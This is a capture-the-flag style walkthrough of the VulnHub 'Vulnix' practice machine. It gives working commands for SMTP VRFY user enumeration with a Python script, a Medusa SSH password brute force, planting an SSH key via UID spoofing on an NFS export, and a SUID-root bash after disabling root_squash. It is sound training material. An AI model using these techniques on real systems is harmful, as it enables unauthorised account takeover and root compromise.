Welcome! In this post, we are going to be exploring ‘Vulnix’.

Vulnix is a machine from the people at VulnHub. Their aim is to provide materials that allow anyone to gain practical ‘hands-on’ experience in digital security, computer software & network administration.

Let’s begin, shall we?

Enumerating the target

An nmap scan to start things off:

root@kali:~# nmap 192.168.128.131

Starting Nmap 7.60 ( https://nmap.org ) at 2017-07-29 18:11 CDT
Nmap scan report for 192.168.128.131
Host is up (0.00024s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
79/tcp   open  finger
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
993/tcp  open  imaps
995/tcp  open  pop3s
2049/tcp open  nfs
MAC Address: 00:0C:29:E3:A2:B1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 16.13 seconds

After some poking, I look to the SMTP service. What will it tell us?

I write a barebones script to use the SMTP VRFY command to test for user accounts:

import socket

rhost = '192.168.128.131'
rport = 25

userfile = '/usr/share/wordlists/metasploit/unix_users.txt'
users = [ u.strip() for u in open(userfile, 'r').readlines() ]

for u in users:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((rhost, rport))
	r = s.recv(1024)
	s.send('VRFY '+u+'\r\n')
	r = s.recv(1024)
	if r[0:3] == '550':
		continue
	print(r)

Not very sophisticated, but this quickly identifies a number of user names. I will now use the names I’ve discovered as part of a brute force attack.

Note: There is also the smtp-user-enum tool in Kali linux for more features.

The attack

I take the pilfered usernames and start trying to authenticate with them.

Medusa quickly uncovers a weak ssh password for the user ‘user’:

root@kali:~$ medusa -h 192.168.128.131 -U users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -M ssh
[...]
ACCOUNT FOUND: [ssh] Host: 192.168.128.131 User: user Password: letmein [SUCCESS]

I use the discovered credential pair to access the vicitim machine:

root@kali:~# ssh user@192.168.128.131
user@192.168.128.131's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jul 29 18:46:04 BST 2017

  System load:  0.0              Processes:           92
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 13%              IP address for eth0: 192.168.128.131
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sat Jul 29 17:09:57 2017 from 192.168.128.130
user@vulnix:~$ 

Local access acheived, now to get root.

Escalating priviliges

One of the first things I check is whether or not ‘user’ can use sudo. Unfortunately the user is not a sudoer on the machine.

user@vulnix:~$ sudo -l
[sudo] password for user:
Sorry, user user may not run sudo on vulnix.

I dig around quite a bit don’t really find much: there are no immediately-obvious vulnerabilities. However, I do discover that ‘user’ is not alone one this machine. There is another account named ‘vulnix’.

Whenever I reach a point where I’m hitting a brick wall I like to take a step back. I go back over everything that I’ve done and ask myself, “What do I NOT see?” I try to retrace steps and find things I’ve overlooked.

I went back and examined the NFS service. Luckily, I found that the nfs service was exporting ‘vulnix’s’ home dir to the world:

root@kali:~# showmount -e 
Export list for 192.168.128.131
/home/vulnix *

Exploiting NFS

I create a temporary directory and mount the exposed share:

root@kali:~# mkdir /tmp/share
root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share -nolock

But there is a problem:

root@kali:~# cd /tmp/share
bash: cd: /tmp/share: Permission denied

But, but I’m root!

After some research it turns out that the share like has ‘root squash’ enabled. If I create a user named ‘vulnix’ on my KALI machine, with the same UID as ‘vulnix’ on the victim machine, I should be able to access the directory.

I ssh back into the victim and get vulnix’s details:

user@vulnix:~$ id vulnix
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

Back on KALI I unmount the share, create the user, and then re-mount the share to test it out as ‘vulnix’:

root@kali:~# umount /tmp/share
root@kali:~# useradd -u 2008 vulnix
root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share -nolock
root@kali:~# su vulnix
$ cd /tmp/share
$ ls -la
total 20
drwxr-x---  2 nobody 4294967294 4096 Sep  2  2012 .
drwxrwxrwt 15 root   root       4096 Sep 15 18:39 ..
-rw-r--r--  1 nobody 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 nobody 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 nobody 4294967294  675 Apr  3  2012 .profile
$ 

Excellent!

Now I will create an SSH key in here to allow me to ssh as vulnix:

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:u3ckUaJq8Vl1UDHg+w/RXGU1Insr7l1h5yTE44suqbg root@kali
The key's randomart image is:
+---[RSA 2048]----+
|           .o=+o=|
|          ..=.ooo|
|         . =.o+ .|
|      . . o .+.+.|
|       +So o..+o=|
|      o o.o oo.*o|
|     .  .  =. +..|
|       . .=.o .o |
|      E.oo +..  .|
+----[SHA256]-----+
root@kali:~# cat ~/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcvpVMJsVDmCPoiMi/rKfrZTPsqL0aFtAMIOHQgcS89Ye0zp55iFAVpdmkoZQBuAidJ/fv4/7RgmArGWVIS6qvLdihxa39LL1y9GbMO9pS63t1ZQ8XYqXQR6SLLG0Ke4yKojCIxQm3lVAQH7nVRU6NNxYMmB2lkajsMlC7Xq6n4L0Xsj2tK33L0IHc+g4tSjKujx7hAjCP9PBwyMD7W4s22EoPYNS2aMqoRW+PUdHVaDtB8A1HSJg21sEyv1B1LM1FX7wiTp9xs88RUeVd5dFZoEocoOgeuTECZplLauRsudtI6cnBsIni6w8v7NeocDB3zuAUJD6zS5cP54LU7VeP root@kali
root@kali:~# su vulnix
$ cd /tmp/share
$ mkdir .ssh
$ cd .ssh
$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcvpVMJsVDmCPoiMi/rKfrZTPsqL0aFtAMIOHQgcS89Ye0zp55iFAVpdmkoZQBuAidJ/fv4/7RgmArGWVIS6qvLdihxa39LL1y9GbMO9pS63t1ZQ8XYqXQR6SLLG0Ke4yKojCIxQm3lVAQH7nVRU6NNxYMmB2lkajsMlC7Xq6n4L0Xsj2tK33L0IHc+g4tSjKujx7hAjCP9PBwyMD7W4s22EoPYNS2aMqoRW+PUdHVaDtB8A1HSJg21sEyv1B1LM1FX7wiTp9xs88RUeVd5dFZoEocoOgeuTECZplLauRsudtI6cnBsIni6w8v7NeocDB3zuAUJD6zS5cP54LU7VeP root@kali' > authorized_keys
$ ^D
root@kali:~# ssh vulnix@192.168.128.131
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jul 29 19:06:50 BST 2017

  System load:  0.0              Processes:           92
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 13%              IP address for eth0: 192.168.128.131
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

I check sudoer permissions for vulnix and see they are restricted to editing /etc/exports.

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ 

I edit /etc/exports to remove the root_squash flag:

vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#  to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
vulnix@vulnix:~$ sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#  to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
vulnix@vulnix:~$

Unfortunately it’s necessary to reboot the machine for the changes to take effect.

After that’s done, I remount it on Kali and copy a version of /bin/bash with SUID root into the dir. This way I will have a nice comfy root shell waiting for me when I ssh back to the host as ‘vulnix’, but you could use any payload you like.

root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share
root@kali:~# cp /bin/bash /tmp/share
root@kali:~# chmod 4777 bash /tmp/share/bash
root@kali:/tmp/mnt# ls -al /tmp/share
drwxr-x---  2 nobody 4294967294 4096 May 16  2012 .
drwxrwxrwt 15 root   root       4096 May 16 18:39 ..
-rwsr-xr-x  1 root   root    1109694 May 16 19:22 bash
-rw-r--r--  1 nobody 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 nobody 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 nobody 4294967294  675 Apr  3  2012 .profile
root@kali:~# ssh vulnix@192.168.128.131
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

* Documentation:  https://help.ubuntu.com/

System information as of Tue May 16 04:41:47 GMT 2016

System load:  0.0              Processes:           90
Usage of /:   93.5% of 773MB   Users logged in:     0
Memory usage: 7%               IP address for eth0: 192.168.128.131
Swap usage:   0%

=> / is using 92.6% of 773MB

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sat Jul 29 04:31:08 2017 from 192.168.128.130
vulnix@vulnix:~$ ls -al
vulnix@vulnix:~$ ./bash -p
./bash: /lib/i386-linux-gnu/libtinfo.so.5: no version information available (required by ./bash)
bash-4.4# whoami
root
bash-4.4# ls /root
trophy.txt
bash-4.4# cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be 

Very nice.

Conclusion

WOW this one was quite challenging, but a lot of fun. I’ll look forward to doing more of these in the future.

Stay tuned!

EOF